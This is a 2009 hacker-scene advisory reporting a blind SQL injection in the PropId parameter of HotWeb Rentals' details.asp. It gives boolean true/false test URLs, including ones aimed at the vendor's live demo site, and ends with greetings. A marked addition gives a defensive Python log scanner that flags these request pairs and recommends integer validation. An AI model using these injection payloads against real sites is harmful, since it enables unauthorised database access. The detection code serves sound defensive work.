
# Title : HotWeb Rentals (details.asp PropId) Blind SQL Injection Vuln
# Published : 2009-09-15
# Author : R3d-D3v!L


[~]----------{In the name of God, the Most Gracious, the Most Merciful}----------
[~] Type: (details.asp PropId) BL!ND SQL Injection Vulnerability
[~] Vendor: www.hotwebscripts.co.uk
[~] Software: HotWeb Rentals
[~] Author: ((R3d D3v!L))
[~] Date: 15.2.2009
[~] Home: CL053D
[~] Contact: X@hotmail.co.jp
[~]----------{DEV!L'5 of SYST3M}----------

[~] ERR0R CONSOLE

WwW.XxX.CcC/details.asp?PropId=(BL!ND EV!L !NJ3c7!0N)

[~] SECURE ALERT FR0M 7h3 R3d-D3V!L

[~] Exploit:

[~] TRU3 : details.asp?PropId=1+and+1=1
[~] FALS3 : details.asp?PropId=1+and+1=2

[~] liv3 3xpL0!T:
[~] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1
[~] F4L53 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2
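
Added example (not part of the original advisory and not the vendor's code): a defender-side log check for the true/false PropId request pair shown above. The simplified log format (client, method, URI), the sample lines and all function names are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (client, method, URI); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 GET /details.asp?PropId=12
203.0.113.7 GET /details.asp?PropId=1+and+1=1
203.0.113.7 GET /details.asp?PropId=1+and+1=2
198.51.100.4 GET /details.asp?PropId=7
198.51.100.9 GET /details.asp?PropId=3%20AND%205=5
"""

# "<id> and <n>=<m>": the true/false test shape shown in the advisory.
BOOL_TEST = re.compile(r"\s*\d+\s+and\s+(\d+)\s*=\s*(\d+)\s*", re.I)

def prop_id(uri):
    """Decoded PropId of a details.asp request, or None for other requests."""
    parts = urlsplit(uri)
    if not parts.path.lower().endswith("/details.asp"):
        return None
    query = {k.lower(): v[0] for k, v in parse_qs(parts.query).items()}
    return query.get("propid")

def classify(value):
    """'ok' for a plain integer, 'true'/'false' for a boolean test, else 'invalid'."""
    if value.isascii() and value.isdigit():
        return "ok"
    m = BOOL_TEST.fullmatch(value)
    if not m:
        return "invalid"
    return "true" if int(m.group(1)) == int(m.group(2)) else "false"

def scan(log_text):
    """Map client -> finding for every client that sent a non-integer PropId."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        value = prop_id(fields[2]) if len(fields) >= 3 else None
        if value is not None:
            seen[fields[0]].add(classify(value))
    findings = {}
    for client, kinds in seen.items():
        if {"true", "false"} <= kinds:
            findings[client] = "boolean-pair"   # both halves of the test seen
        elif kinds - {"ok"}:
            findings[client] = "non-integer PropId"
    return findings
```

The "ok" branch of classify() is the same strict-integer test the application should apply to PropId before the value reaches a query; anything else should be rejected.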



N073:
R34L R3d-D3V!L WAS h3R3 ((X@Minhal.co.il))

4R48!4N-HACK3R!!

[~]-----------------------------{str0ke}-----------------------------------------------------

[~] Greetz tO: {str0ke} & XP_10 & B0rN 2 K!LL & JUPA & D3V!L-FUCK3R
[~] 70 ALL ARAB!AN HACKER 3X3PT: LAM3RZ
[~] special thanks : ((dolly)) & ((7am3m)) & MAGOUSH ;) & EMAD & 0R45h3Y

[~] special SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE''

[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007

[~] special FR!ND: 74M3M

[~] !'M 4R48!4N 3XPL0!73R.

[~]--------------------------------------------------------------------------------

# www.Syue.com [2009-09-15]